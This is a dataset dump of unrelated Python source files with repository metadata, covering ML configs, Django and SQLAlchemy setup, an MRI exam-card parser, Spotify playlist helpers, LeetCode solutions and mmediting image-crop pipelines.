# pp_common += f'|onehot({config.num_classes})'
# To use ancestor 'smearing', use this line instead:
pp_common += f'|onehot({config.num_classes}, key="label", key_result="labels")' # pylint: disable=line-too-long
pp_common += '|keep(["image", "labels"])'
config.pp_train = f'decode|inception_crop({INPUT_RES})|flip_lr' + pp_common
config.pp_eval = f'decode|resize({INPUT_RES})' + pp_common
config.shuffle_buffer_size = 50_000 # Per host, so small-ish is ok.
config.log_training_steps = 10
config.log_eval_steps = 100
# NOTE: eval is very fast O(seconds) so it's fine to run it often.
config.checkpoint_steps = 1000
config.checkpoint_timeout = 1
config.prefetch_to_device = 2
config.trial = 0
# Model section
# pre-trained model ckpt file
# !!! The below section should be modified per experiment
config.model_init = '/path/to/pretrained_model_ckpt.npz'
# Model definition to be copied from the pre-training config
config.model = ml_collections.ConfigDict()
config.model.patches = ml_collections.ConfigDict()
config.model.patches.size = [16, 16]
config.model.hidden_size = 768
config.model.transformer = ml_collections.ConfigDict()
config.model.transformer.attention_dropout_rate = 0.
config.model.transformer.dropout_rate = 0.
config.model.transformer.mlp_dim = 3072
config.model.transformer.num_heads = 12
config.model.transformer.num_layers = 12
config.model.classifier = 'token' # Or 'gap'
# Re-initialize the trainable parameters in GP output layer (Also those in the
# dense output layer if loading from deterministic checkpoint).
config.model_reinit_params = ('head/output_layer/kernel',
'head/output_layer/bias', 'head/kernel',
'head/bias')
# This is "no head" fine-tuning, which we use by default
config.model.representation_size = None
# Gaussian process layer section
config.gp_layer = ml_collections.ConfigDict()
config.gp_layer.ridge_penalty = 1.
# Disable momentum in order to use exact covariance update for finetuning.
config.gp_layer.covmat_momentum = -1.
config.gp_layer.mean_field_factor = 20.
# Optimizer section
config.optim_name = 'Momentum'
config.optim = ml_collections.ConfigDict()
config.grad_clip_norm = -1.
config.weight_decay = None # No explicit weight decay
config.loss = 'softmax_xent' # or 'sigmoid_xent'
config.lr = ml_collections.ConfigDict()
# Best lr.base depends on what pretrained ViT model is used.
# (e.g., for deterministic ViT pretrained model, lr.base=0.0007;
# for ViT-GP pretrained model, lr.base=0.0003)
config.lr.base = 0.0003
config.lr.warmup_steps = 500
config.lr.decay_type = 'cosine'
config.args = {}
return config
| 35.316239
| 114
| 0.723136
|
dc30811ed621815d0fb75df95b4176a7970c898b
| 124
|
py
|
Python
|
blog/admin.py
|
arpitansu/src
|
a5221fdd1ab9bb3b51be6a7ed338a0886fdc68e8
|
[
"MIT"
] | null | null | null |
blog/admin.py
|
arpitansu/src
|
a5221fdd1ab9bb3b51be6a7ed338a0886fdc68e8
|
[
"MIT"
] | 2
|
2021-03-30T14:15:31.000Z
|
2021-04-08T21:55:29.000Z
|
blog/admin.py
|
arpitansu/src
|
a5221fdd1ab9bb3b51be6a7ed338a0886fdc68e8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import BlogPost
# Register your models here.
admin.site.register(BlogPost)
| 15.5
| 32
| 0.798387
|
c5afde903c994c1ca57f1fa41db2b2eb96c27dd5
| 387
|
py
|
Python
|
blockchain/database/db.py
|
Adasumizox/crypto
|
45cb3cd19007a1b319efea20137a04a83afcf975
|
[
"MIT"
] | null | null | null |
blockchain/database/db.py
|
Adasumizox/crypto
|
45cb3cd19007a1b319efea20137a04a83afcf975
|
[
"MIT"
] | null | null | null |
blockchain/database/db.py
|
Adasumizox/crypto
|
45cb3cd19007a1b319efea20137a04a83afcf975
|
[
"MIT"
] | null | null | null |
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
SQLALCHEMY_DATABASE_URL = 'sqlite:///./blockchain.db'
engine = create_engine(
SQLALCHEMY_DATABASE_URL, connect_args={"check_same_thread": False}
)
SessionLocal = sessionmaker(autocomit=False, autoflush=False, bind=engine)
Base = declarative_base()
| 32.25
| 74
| 0.819121
|
7e4cc7754dcbfda2b4bf225a993ac123ae4cf04d
| 5,446
|
py
|
Python
|
scripts/generate_ant_maze_datasets.py
|
Thibaud-Ardoin/d4rl
|
631cdcbf93441384dcf96df39a70c287749ab2ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/generate_ant_maze_datasets.py
|
Thibaud-Ardoin/d4rl
|
631cdcbf93441384dcf96df39a70c287749ab2ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/generate_ant_maze_datasets.py
|
Thibaud-Ardoin/d4rl
|
631cdcbf93441384dcf96df39a70c287749ab2ad
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pickle
import gzip
import h5py
import argparse
from offline_rl.locomotion import maze_env, ant, swimmer
from offline_rl.locomotion.wrappers import NormalizedBoxEnv
import torch
from PIL import Image
import os
def reset_data():
return {'observations': [],
'actions': [],
'terminals': [],
'rewards': [],
'infos/goal': [],
'infos/qpos': [],
'infos/qvel': [],
}
def append_data(data, s, a, r, tgt, done, env_data):
data['observations'].append(s)
data['actions'].append(a)
data['rewards'].append(r)
data['terminals'].append(done)
data['infos/goal'].append(tgt)
data['infos/qpos'].append(env_data.qpos.ravel().copy())
data['infos/qvel'].append(env_data.qvel.ravel().copy())
def npify(data):
for k in data:
if k == 'terminals':
dtype = np.bool_
else:
dtype = np.float32
data[k] = np.array(data[k], dtype=dtype)
def load_policy(policy_file):
data = torch.load(policy_file)
policy = data['exploration/policy']
env = data['evaluation/env']
print("Policy loaded")
return policy, env
def save_video(save_dir, file_name, frames, episode_id=0):
filename = os.path.join(save_dir, file_name+ '_episode_{}'.format(episode_id))
if not os.path.exists(filename):
os.makedirs(filename)
num_frames = frames.shape[0]
for i in range(num_frames):
img = Image.fromarray(np.flipud(frames[i]), 'RGB')
img.save(os.path.join(filename, 'frame_{}.png'.format(i)))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--noisy', action='store_true', help='Noisy actions')
parser.add_argument('--maze', type=str, default='u-maze', help='Maze type. small or default')
parser.add_argument('--num_samples', type=int, default=int(1e5), help='Num samples to collect')
parser.add_argument('--env', type=str, default='Ant', help='Environment type')
parser.add_argument('--policy_file', type=str, default='policy_file', help='file_name')
parser.add_argument('--max_episode_steps', default=1000, type=int)
parser.add_argument('--video', action='store_true')
parser.add_argument('--multi_start', action='store_true')
parser.add_argument('--multigoal', action='store_true')
args = parser.parse_args()
if args.maze == 'u-maze':
maze = maze_env.U_MAZE
elif args.maze == 'big-maze':
maze = maze_env.BIG_MAZE
elif args.maze == 'hardest-maze':
maze = maze_env.HARDEST_MAZE
else:
raise NotImplementedError
import ipdb; ipdb.set_trace()
if args.env == 'Ant':
env = NormalizedBoxEnv(ant.AntMazeEnv(maze_map=maze, maze_size_scaling=4.0, non_zero_reset=args.multi_start))
elif args.env == 'Swimmer':
env = NormalizedBoxEnv(swimmer.SwimmerMazeEnv(mmaze_map=maze, maze_size_scaling=4.0, non_zero_reset=args.multi_start))
else:
raise NotImplementedError
env.set_target()
s = env.reset()
act = env.action_space.sample()
done = False
# Load the policy
policy, train_env = load_policy(args.policy_file)
# Define goal reaching policy fn
def _goal_reaching_policy_fn(obs, goal):
goal_x, goal_y = goal
obs_new = obs[2:-2]
goal_tuple = np.array([goal_x, goal_y])
# normalize the norm of the relative goals to in-distribution values
goal_tuple = goal_tuple / np.linalg.norm(goal_tuple) * 10.0
new_obs = np.concatenate([obs_new, goal_tuple], -1)
return policy.get_action(new_obs)[0], (goal_tuple[0] + obs[0], goal_tuple[1] + obs[1])
data = reset_data()
# create waypoint generating policy integrated with high level controller
data_collection_policy = env.create_navigation_policy(
_goal_reaching_policy_fn,
)
if args.video:
frames = []
ts = 0
num_episodes = 0
for _ in range(args.num_samples):
act, waypoint_goal = data_collection_policy(s)
if args.noisy:
act = act + np.random.randn(*act.shape)*0.2
act = np.clip(act, -1.0, 1.0)
ns, r, done, info = env.step(act)
if ts >= args.max_episode_steps:
done = True
append_data(data, s[:-2], act, r, env.target_goal, done, env.physics.data)
if len(data['observations']) % 10000 == 0:
print(len(data['observations']))
ts += 1
if done:
done = False
ts = 0
s = env.reset()
env.set_target_goal()
if args.video:
frames = np.array(frames)
save_video('./videos/', args.env + '_navigation', frames, num_episodes)
num_episodes += 1
frames = []
else:
s = ns
if args.video:
curr_frame = env.physics.render(width=500, height=500, depth=False)
frames.append(curr_frame)
if args.noisy:
fname = args.env + '_maze_%s_noisy_multistart_%s_multigoal_%s.hdf5' % (args.maze, str(args.multi_start), str(args.multigoal))
else:
fname = args.env + 'maze_%s_multistart_%s_multigoal_%s.hdf5' % (args.maze, str(args.multi_start), str(args.multigoal))
dataset = h5py.File(fname, 'w')
npify(data)
for k in data:
dataset.create_dataset(k, data=data[k], compression='gzip')
if __name__ == '__main__':
main()
| 32.807229
| 133
| 0.624311
|
f2657fb6ee0626dd9bf41c6d21da48be0370016e
| 8,057
|
py
|
Python
|
xnatwrapper/examcard2json.py
|
lawlessrd/aslprep
|
22ec61f482cc3561f4fd35d769af0fe8bc2e80cb
|
[
"BSD-3-Clause"
] | null | null | null |
xnatwrapper/examcard2json.py
|
lawlessrd/aslprep
|
22ec61f482cc3561f4fd35d769af0fe8bc2e80cb
|
[
"BSD-3-Clause"
] | null | null | null |
xnatwrapper/examcard2json.py
|
lawlessrd/aslprep
|
22ec61f482cc3561f4fd35d769af0fe8bc2e80cb
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
'''
Inputs:
-i: Filename of text file containing Exam Card info
-s: List of asl scan names to search in exam card
-b: BIDS file structure containing nifti files and json sidecars
Outputs:
updated json sidecar for ASL images in Exam Card
Name: sub-01_ses-01_asl.json OR sub-01_ses-01_m0scan.json
Required inputs for json sidecar
ASL general metadata fields:
MagneticFieldStrength
MRAcquisitionType (2D or 3D)
EchoTime
If MRAcquisitionType definied as 2D:
SliceTiming
If LookLocker is True:
RepetitionTimePreparation
FlipAngle
ArterialSpinLabelingType (CASL, PCASL, PASL)
PostLabelingDelay (in seconds) (0 for m0scans)
BackgroundSuppression
M0Type
TotalAcquiredPairs
(P)CASL specific metadata fields:
LabelingDuration (0 for m0scans)
PASL specific metadata fields:
BolusCutOffFlag (boolean)
If BolusCutOffFlag is True:
BolusCutOffDelayTime
BolusCutOffTechnique
m0scan metadata fields:
EchoTime
RepetitionTimePreparation
If LookLocker is True:
FlipAngle
IntendedFor (string with associated ASL image filename)
Units of time should always be seconds.
'''
### To do:
# loan in json with scan names instead of using inputs
# make sure script can find examcard
from __future__ import print_function
import json
import re
import sys, getopt
import glob
import numpy as np
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def search_string_in_file(file_name, string_to_search, starting_line):
"""
Search for given string in file starting at provided line number
and return the first line containing that string,
along with line numbers.
:param file_name: name of text file to scrub
:param string_to_search: string of text to search for in file
:param starting_line: line at which search starts
"""
line_number = 0
list_of_results = []
# Open file in read only mode
with open(file_name, 'r') as read_obj:
# Read all lines one by one
for line in read_obj:
line_number += 1
if line_number < starting_line:
continue
else:
line = line.rstrip()
if re.search(r"{}".format(string_to_search),line):
# If yes add the line number & line as a tuple in the list
list_of_results.append((line_number,line.rstrip()))
#Return list of tuples containing line numbers and lines where string is found
return list_of_results
def modify_json(json_file, s_dict):
"""
Add contents of s_dict to .json file
:param json_file: name of json file
:param s_dict: dictionary of info to add to .json file
"""
if json_file:
with open(json_file, 'r') as f:
json_contents = json.load(f)
json_contents.update(s_dict)
f.close
with open(json_file, 'w') as f:
json.dump(json_contents,f,indent = 4,cls=NumpyEncoder)
f.close
print('Added exam card information to',json_file)
else:
print('Files not found or data is not in BIDS format. Please repeat with correct file/structure.')
sys.exit()
def main(argv):
indir = ''
scannames = ''
bids = ''
inputfile= ''
try:
opts, args = getopt.getopt(argv, "hi:b:e:",["input=","bids=","examcard="])
except getopt.GetoptError:
print('examcard2json.py -i <indir> -b <folder> -e <examcard.txt>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('examcard2json.py -i <indir> -b <folder> -e <examcard.txt>')
sys.exit()
elif opt in ("-i", "--input"):
indir = arg
elif opt in ("-b", "--bids"):
bids = arg
elif opt in ("-e","--examcard"):
inputfile = arg
#Initialize dictionaries
scan_dict = {}
#Get scans from SeriesDescription.json
with open(indir + '/SeriesDescription.json','r') as infile:
scannames = json.load(infile)
for scan in scannames.values():
scan_dict[scan] = {}
print('\nStarting scan:', scan)
find_scans = search_string_in_file(inputfile,scan,0)
# Find start of scan section
string_to_search = 'Protocol Name: ' + scan
if find_scans:
for line in find_scans:
for num in line:
if re.search(r"\b{}\b".format(string_to_search),str(num)):
start_line = line[0]
search_tmp = search_string_in_file(inputfile,'Arterial Spin labeling',start_line)
tmp = search_tmp[0][1].split(':')
asl_type = tmp[-1].strip()
# set repetiion time prep until better method found
scan_dict[scan]["RepetitionTimePreparation"] = 0
print('\tRepetition Time Preparation:',str(0), 'sec')
# If ASL type is 'NO', then scan is m0
if asl_type == 'NO':
print('\tASL type: M0 scan')
# Get file name for non-m0 scan to set as 'IntendedFor'
# Change this to look through BIDS directory
for s in scannames:
if s.find('m0') == -1 & s.find('M0') == -1:
for nii_file in glob.glob(bids + '/sub-*/ses-*/perf/*.nii.gz'):
if nii_file.find('m0') == -1 & nii_file.find('M0') == -1:
asl_nii = nii_file.split('/')
IntendedFor = '/'.join(asl_nii[-3:])
print('\tM0 intended for: ',IntendedFor)
scan_dict[scan]["IntendedFor"] = IntendedFor
# Add exam card info to m0 json
json_file = glob.glob(bids+'/sub-*/ses-*/perf/*m0scan.json')
modify_json(json_file[0],scan_dict[scan])
else:
print('\tASL type:',asl_type)
scan_dict[scan]["ArterialSpinLabelingType"] = asl_type.upper()
# Set M0 type
if any('m0' or 'M0' in s for s in scannames):
M0_type = 'Separate'
else:
M0_type = 'Absent'
scan_dict[scan]["M0Type"] = M0_type
print('\tM0 type:',M0_type)
# Parse exam card for background suppression
search_tmp = search_string_in_file(inputfile,'back. supp.',start_line)
tmp = search_tmp[0][1].split(':')
back_supp = tmp[-1].strip()
if back_supp == 'NO':
back_supp = False
else:
back_supp = True
print('\tBackground Suppression:', back_supp)
scan_dict[scan]["BackgroundSuppression"] = back_supp
# Parse exam card for label delay
search_tmp = search_string_in_file(inputfile,'label delay',start_line)
tmp = search_tmp[0][1].split(':')
label_delay = int(tmp[-1].strip())/1000
print('\tLabel delay:',label_delay, 'sec')
scan_dict[scan]["PostLabelingDelay"] = label_delay
# Parse exam card for TR and nSlices to generate slice timing
search_tmp = search_string_in_file(inputfile,'Slices',start_line)
tmp = search_tmp[0][1].split(':')
n_slices = int(tmp[-1].strip())
search_tmp = search_string_in_file(inputfile,'TR ',start_line)
tmp = search_tmp[0][1].split(':')
if tmp[-1].strip() == 'USER_DEF':
search_tmp = search_string_in_file(inputfile,'(ms)',search_tmp[0][0])
tmp = search_tmp[0][1].split(':')
tr = float(tmp[-1].strip())/1000
else:
tr = float(tmp[-1].strip())/1000
# calculate slice timing
ta = tr/n_slices
slice_timing = np.linspace(0,tr-ta,n_slices) #ascending
print('\tSlice timing:',slice_timing, 'sec')
scan_dict[scan]["SliceTiming"] = slice_timing.tolist()
if asl_type == 'pCASL' or 'CASL':
# Parse exam card for background suppression
search_tmp = search_string_in_file(inputfile,'label duration',start_line)
if not search_tmp:
search_tmp = search_string_in_file(inputfile,'EX_FLL_casl_dur',start_line)
tmp = search_tmp[0][1].split(':')
label_duration = int(tmp[-1].strip())/1000
print('\tLabeling duration:',label_duration, 'sec')
scan_dict[scan]["LabelingDuration"] = label_duration
if asl_type == 'pASL':
# Parse exam card for background suppression
#search_tmp = search_string_in_file(inputfile,'BolusCutOffFlag',start_line)
#tmp = search_tmp[0][1].split(':')
#bolus = tmp[-1].strip()
#print('\tBolus Cut Off Flag:',bolus)
scan_dict[scan]["BolusCutOffFlag"] = False
# Add exam card info to asl json
json_file = glob.glob(bids+'/sub-*/ses-*/perf/*asl.json')
modify_json(json_file[0],scan_dict[scan])
else:
print(scan,' not found. Please repeat with correct scan name.')
sys.exit()
if __name__ == '__main__':
main(sys.argv[1:])
| 31.350195
| 100
| 0.685367
|
bfc5e876d5aca8719bc659c9430188beb11437f2
| 2,842
|
py
|
Python
|
FunnelCake/SpotifyHelper.py
|
JaredDyreson/Funnel-Cake
|
8d0343c30921b4c0a865d5a5ae11a5ee1f1e8b28
|
[
"MIT"
] | 1
|
2021-06-11T01:28:44.000Z
|
2021-06-11T01:28:44.000Z
|
FunnelCake/SpotifyHelper.py
|
JaredDyreson/Funnel-Cake
|
8d0343c30921b4c0a865d5a5ae11a5ee1f1e8b28
|
[
"MIT"
] | 1
|
2022-02-18T06:57:15.000Z
|
2022-02-18T06:57:15.000Z
|
FunnelCake/SpotifyHelper.py
|
JaredDyreson/Funnel-Cake
|
8d0343c30921b4c0a865d5a5ae11a5ee1f1e8b28
|
[
"MIT"
] | null | null | null |
"""
attempts to control functions that would directly manipulate Spotify playlists (more of a collection of scripts)
"""
from FunnelCake import SpotifyPlaylist
from FunnelCake import PlaylistManager
from pprint import pprint
import re
def clone(manager: PlaylistManager, src: str, force_override=False, custom_name=None):
if (not isinstance(manager, PlaylistManager.PlaylistManager) or
not isinstance(src, str)):
raise ValueError
src = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, src)
destination_url = manager.create(f"{src.name} | CLONED" if not custom_name else custom_name)
if(isinstance(destination_url, bool)
or force_override):
print(f'[ERROR] Cannot clone {src.name}, it already exists (no override specified)')
return
cloned_playlist = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, destination_url)
cloned_playlist.append(src.tracks)
print(f"[+] Successfully cloned {src.name}")
def merge(container: list, manager: PlaylistManager, output_name: str):
if not(isinstance(container, list)
and isinstance(manager, PlaylistManager.PlaylistManager)
and isinstance(output_name, str)):
raise ValueError
print(f'[INFO] Merging {len(container)} playlists together')
if not(output_name):
print('[ERROR] You have not supplied an output name')
return
master_, names, collaborators = None, [], set()
for element in container:
element = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, element)
names.append(element.name)
collaborators.add(element.playlist_owner_display_name())
master_ = master_ + element if master_ else element
names, collabs = ', '.join(names), ', '.join(collaborators)
destination_url = manager.create(output_name, True, f'Playlist from {len(container)} playlists: {names}. Collaborators(s): {collabs}')
new_playlist = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, destination_url)
if(isinstance(destination_url, bool)):
print(f'[ERROR] Could not store contents of {len(container)} playlists @ "{output_name}"; already exists')
return
else:
new_playlist.append(master_)
print(f'[SUCCESS] Created {output_name} from {names}')
def analyze(playlist: SpotifyPlaylist, manager: PlaylistManager) -> dict:
artists = {}
content = [subelement for element in playlist.get_detailed_track_info() for subelement in element]
for track in content:
collaborators = track["artists"]
for element in collaborators:
artist = element["name"]
if(artist not in artists.keys()):
artists[artist] = 1
else:
artists[artist]+=1
return {k: v for k, v in sorted(artists.items(), key=lambda item: item[1])}
| 39.472222
| 138
| 0.695285
|
bdb55d9dd66ff4acee9db7ce122e9e127833f376
| 772
|
py
|
Python
|
problem5.py
|
mpUrban/python_problems
|
d8c67a33119dce3a558bb1e76b9d3595932ddfa8
|
[
"MIT"
] | null | null | null |
problem5.py
|
mpUrban/python_problems
|
d8c67a33119dce3a558bb1e76b9d3595932ddfa8
|
[
"MIT"
] | null | null | null |
problem5.py
|
mpUrban/python_problems
|
d8c67a33119dce3a558bb1e76b9d3595932ddfa8
|
[
"MIT"
] | null | null | null |
# written in VS Code with jupyter extension
#https://simpleprogrammer.com/programming-interview-questions/
# How do you find duplicate numbers in an array if it contains multiple duplicates?
#%%
testArray = [2,1,5,8,4,5,4,7,3,9,4,6,1]
print('Given array: ' + str(testArray))
#print('Pairs with sum equal to target: ')
#%%
newArray = []
dupeArray = []
for element in testArray:
if element not in newArray:
newArray.append(element)
else:
dupeArray.append(element)
#%%
print('The array with duplicates removed is: ')
print(newArray)
print('The duplicates found are: ')
print(dupeArray)
#%%
tempArray = {}
for i in testArray:
# get(key, default) falls back to default if key is not present
tempArray[i] = tempArray.get(i, 0) + 1
tempArray
| 24.125
| 83
| 0.694301
|
aedd70eb81f88f6c8d90ce17075cec2c30a85149
| 615
|
py
|
Python
|
0088_Merge_Sorted_Array.py
|
21PIRLO21/LeetCode2020
|
ccf318749067214ff3cdf9964a81d6b8422f986e
|
[
"MIT"
] | null | null | null |
0088_Merge_Sorted_Array.py
|
21PIRLO21/LeetCode2020
|
ccf318749067214ff3cdf9964a81d6b8422f986e
|
[
"MIT"
] | null | null | null |
0088_Merge_Sorted_Array.py
|
21PIRLO21/LeetCode2020
|
ccf318749067214ff3cdf9964a81d6b8422f986e
|
[
"MIT"
] | null | null | null |
import List
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
# 从后往前双指针
index1, index2 = m - 1, n - 1
end = m + n - 1
while index1 >= 0 and index2 >= 0:
if nums1[index1] >= nums2[index2]:
nums1[end] = nums1[index1]
index1 -= 1
else:
nums1[end] = nums2[index2]
index2 -= 1
end -= 1
nums1[:index2+1] = nums2[:index2+1]
| 27.954545
| 81
| 0.445528
|
6d465fb0b2dd635abace840c0b0720296abc6426
| 1,263
|
py
|
Python
|
Python version/languages/asp/answer_set.py
|
DomenicoIngrati/EmbASP
|
05000e0e65e7c84609f45e76dd32f7abaa0c5fbe
|
[
"MIT"
] | null | null | null |
Python version/languages/asp/answer_set.py
|
DomenicoIngrati/EmbASP
|
05000e0e65e7c84609f45e76dd32f7abaa0c5fbe
|
[
"MIT"
] | null | null | null |
Python version/languages/asp/answer_set.py
|
DomenicoIngrati/EmbASP
|
05000e0e65e7c84609f45e76dd32f7abaa0c5fbe
|
[
"MIT"
] | null | null | null |
from languages.asp.asp_mapper import ASPMapper
class AnswerSet(object):
"""A collection of data representing a generic Answer Set."""
def __init__(self, value, weight_map=None):
if weight_map is None:
weight_map = dict()
self.__value = value # Where data of answer set is stored
self.__weight_map = weight_map # Where weights of the answer set are stored
self.__atoms = set() # Where answer set's atoms are stored
def get_answer_set(self):
"""Return the current __value data.
The method return a list of answer sets in a String format.
"""
return self.__value
def get_atoms(self):
"""Return atoms stored in __atoms.
The method return a set of Object filled with atoms data.
"""
if not self.__atoms:
mapper = ASPMapper.get_instance()
for atom in self.__value:
obj = mapper.get_object(atom)
if obj is not None:
self.__atoms.add(obj)
return self.__atoms
def get_weights(self):
"""Return the weight_map."""
return self.__weight_map
def __str__(self):
"""Overload string method."""
return str(self.__value)
| 30.071429
| 84
| 0.608076
|
ee0a01b95bd37d1e0a51b0694b2d564962edf877
| 295
|
py
|
Python
|
travello/models.py
|
Prantikc22/Travel-App-Django
|
2542590ea7c22da671abd561b5b06215bb3fd37c
|
[
"MIT"
] | null | null | null |
travello/models.py
|
Prantikc22/Travel-App-Django
|
2542590ea7c22da671abd561b5b06215bb3fd37c
|
[
"MIT"
] | 6
|
2021-03-19T02:45:08.000Z
|
2021-09-08T01:57:23.000Z
|
travello/models.py
|
Prantikc22/Travel-App-Django
|
2542590ea7c22da671abd561b5b06215bb3fd37c
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Destination(models.Model):
name = models.CharField(max_length=100)
img = models.ImageField(upload_to='pics')
dsc = models.TextField()
price = models.IntegerField()
offer = models.BooleanField(default=False)
| 26.818182
| 46
| 0.715254
|
51fa24253cdcec1fdd214ee2e7fcf7018e5676c1
| 28,289
|
py
|
Python
|
mmedit/datasets/pipelines/crop.py
|
akimotty877/mmediting
|
cae872d6f3e867ba144c7c0dbc29a0ee1a29e5a6
|
[
"Apache-2.0"
] | null | null | null |
mmedit/datasets/pipelines/crop.py
|
akimotty877/mmediting
|
cae872d6f3e867ba144c7c0dbc29a0ee1a29e5a6
|
[
"Apache-2.0"
] | null | null | null |
mmedit/datasets/pipelines/crop.py
|
akimotty877/mmediting
|
cae872d6f3e867ba144c7c0dbc29a0ee1a29e5a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
import math
import random
import mmcv
import numpy as np
from torch.nn.modules.utils import _pair
from ..registry import PIPELINES
from .utils import random_choose_unknown
@PIPELINES.register_module()
class Crop:
"""Crop data to specific size for training.
Args:
keys (Sequence[str]): The images to be cropped.
crop_size (Tuple[int]): Target spatial size (h, w).
random_crop (bool): If set to True, it will random crop
image. Otherwise, it will work as center crop.
is_pad_zeros (bool, optional): Whether to pad the image with 0 if
crop_size is greater than image size. Default: False.
"""
def __init__(self, keys, crop_size, random_crop=True, is_pad_zeros=False):
if not mmcv.is_tuple_of(crop_size, int):
raise TypeError(
'Elements of crop_size must be int and crop_size must be'
f' tuple, but got {type(crop_size[0])} in {type(crop_size)}')
self.keys = keys
self.crop_size = crop_size
self.random_crop = random_crop
self.is_pad_zeros = is_pad_zeros
def _crop(self, data):
if not isinstance(data, list):
data_list = [data]
else:
data_list = data
crop_bbox_list = []
data_list_ = []
for item in data_list:
data_h, data_w = item.shape[:2]
crop_h, crop_w = self.crop_size
if self.is_pad_zeros:
crop_y_offset, crop_x_offset = 0, 0
if crop_h > data_h:
crop_y_offset = (crop_h - data_h) // 2
if crop_w > data_w:
crop_x_offset = (crop_w - data_w) // 2
if crop_y_offset > 0 or crop_x_offset > 0:
pad_width = [(2 * crop_y_offset, 2 * crop_y_offset),
(2 * crop_x_offset, 2 * crop_x_offset)]
if item.ndim == 3:
pad_width.append((0, 0))
item = np.pad(
item,
tuple(pad_width),
mode='constant',
constant_values=0)
data_h, data_w = item.shape[:2]
crop_h = min(data_h, crop_h)
crop_w = min(data_w, crop_w)
if self.random_crop:
x_offset = np.random.randint(0, data_w - crop_w + 1)
y_offset = np.random.randint(0, data_h - crop_h + 1)
else:
x_offset = max(0, (data_w - crop_w)) // 2
y_offset = max(0, (data_h - crop_h)) // 2
crop_bbox = [x_offset, y_offset, crop_w, crop_h]
item_ = item[y_offset:y_offset + crop_h,
x_offset:x_offset + crop_w, ...]
crop_bbox_list.append(crop_bbox)
data_list_.append(item_)
if not isinstance(data, list):
return data_list_[0], crop_bbox_list[0]
return data_list_, crop_bbox_list
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
for k in self.keys:
data_, crop_bbox = self._crop(results[k])
results[k] = data_
results[k + '_crop_bbox'] = crop_bbox
results['crop_size'] = self.crop_size
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'keys={self.keys}, crop_size={self.crop_size}, '
f'random_crop={self.random_crop}')
return repr_str
@PIPELINES.register_module()
class RandomResizedCrop(object):
"""Crop data to random size and aspect ratio.
A crop of a random proportion of the original image
and a random aspect ratio of the original aspect ratio is made.
The cropped image is finally resized to a given size specified
by 'crop_size'. Modified keys are the attributes specified in "keys".
This code is partially adopted from
torchvision.transforms.RandomResizedCrop:
[https://pytorch.org/vision/stable/_modules/torchvision/transforms/\
transforms.html#RandomResizedCrop].
Args:
keys (list[str]): The images to be resized and random-cropped.
crop_size (int | tuple[int]): Target spatial size (h, w).
scale (tuple[float], optional): Range of the proportion of the original
image to be cropped. Default: (0.08, 1.0).
ratio (tuple[float], optional): Range of aspect ratio of the crop.
Default: (3. / 4., 4. / 3.).
interpolation (str, optional): Algorithm used for interpolation.
It can be only either one of the following:
"nearest" | "bilinear" | "bicubic" | "area" | "lanczos".
Default: "bilinear".
"""
def __init__(self,
keys,
crop_size,
scale=(0.08, 1.0),
ratio=(3. / 4., 4. / 3.),
interpolation='bilinear'):
assert keys, 'Keys should not be empty.'
if isinstance(crop_size, int):
crop_size = (crop_size, crop_size)
elif not mmcv.is_tuple_of(crop_size, int):
raise TypeError('"crop_size" must be an integer '
'or a tuple of integers, but got '
f'{type(crop_size)}')
if not mmcv.is_tuple_of(scale, float):
raise TypeError('"scale" must be a tuple of float, '
f'but got {type(scale)}')
if not mmcv.is_tuple_of(ratio, float):
raise TypeError('"ratio" must be a tuple of float, '
f'but got {type(ratio)}')
self.keys = keys
self.crop_size = crop_size
self.scale = scale
self.ratio = ratio
self.interpolation = interpolation
def get_params(self, data):
"""Get parameters for a random sized crop.
Args:
data (np.ndarray): Image of type numpy array to be cropped.
Returns:
A tuple containing the coordinates of the top left corner
and the chosen crop size.
"""
data_h, data_w = data.shape[:2]
area = data_h * data_w
for _ in range(10):
target_area = random.uniform(*self.scale) * area
log_ratio = (math.log(self.ratio[0]), math.log(self.ratio[1]))
aspect_ratio = math.exp(random.uniform(*log_ratio))
crop_w = int(round(math.sqrt(target_area * aspect_ratio)))
crop_h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < crop_w <= data_w and 0 < crop_h <= data_h:
top = random.randint(0, data_h - crop_h)
left = random.randint(0, data_w - crop_w)
return top, left, crop_h, crop_w
# Fall back to center crop
in_ratio = float(data_w) / float(data_h)
if (in_ratio < min(self.ratio)):
crop_w = data_w
crop_h = int(round(crop_w / min(self.ratio)))
elif (in_ratio > max(self.ratio)):
crop_h = data_h
crop_w = int(round(crop_h * max(self.ratio)))
else: # whole image
crop_w = data_w
crop_h = data_h
top = (data_h - crop_h) // 2
left = (data_w - crop_w) // 2
return top, left, crop_h, crop_w
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
for k in self.keys:
top, left, crop_h, crop_w = self.get_params(results[k])
crop_bbox = [top, left, crop_w, crop_h]
results[k] = results[k][top:top + crop_h, left:left + crop_w, ...]
results[k] = mmcv.imresize(
results[k],
self.crop_size,
return_scale=False,
interpolation=self.interpolation)
results[k + '_crop_bbox'] = crop_bbox
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'(keys={self.keys}, crop_size={self.crop_size}, '
